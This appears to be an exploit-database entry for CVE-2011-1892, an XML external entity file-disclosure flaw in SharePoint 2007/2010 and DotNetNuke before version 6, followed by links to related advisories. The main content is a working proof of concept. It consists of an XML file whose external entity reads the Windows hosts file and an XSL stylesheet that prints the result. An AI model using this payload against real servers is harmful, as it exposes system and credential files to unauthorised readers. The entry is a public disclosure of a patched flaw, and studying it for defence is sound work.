Lucene search
Nicolas Gregoire1337DAY-ID-16953HistorySep 19, 2011 - 12:00 a.m.
File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6
2011-09-1900:00:00
Nicolas Gregoire
0day.today
20
Exploit for windows platform in category web applications
Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892
poc filename: xee.xml
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>
poc filename: xee.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:apply-templates/>
<xsl:value-of select="doc"/>
</xsl:template>
</xsl:stylesheet>
# 0day.today [2018-01-05] #Related
exploitpack
exploitpack
SharePoint 20072010 and DotNetNuke 6 - File Disclosure (via XEE)
2011-09-20 00:00:00
packetstorm
packetstorm
SharePoint 2007 / 2010 And DotNetNuke File Disclosure
2011-09-21 00:00:00
seebug
seebug
SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE
2014-07-01 00:00:00
Microsoft SharePoint XMLε€ηθΏη¨ζδ»Άζ³ι²ζΌζ΄
2011-10-21 00:00:00
nvd
nvd
CVE-2011-1892
2011-09-15 12:26:48
securityvulns
securityvulns
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
2011-09-20 00:00:00
Microsoft Sharepoint multiple security vulnerabilities
2011-09-20 00:00:00
cvelist
cvelist
CVE-2011-1892
2011-09-15 10:00:00
exploitdb
exploitdb
SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure (via XEE)
2011-09-20 00:00:00
prion
prion
Arbitrary file deletion
2011-09-15 12:26:00
checkpoint_advisories
checkpoint_advisories
cve
cve
CVE-2011-1892
2011-09-15 12:26:48
openvas
openvas
Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858)
2011-09-14 00:00:00
Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858)
2011-09-14 00:00:00
nessus
nessus
mskb
mskb
Related for 1337DAY-ID-16953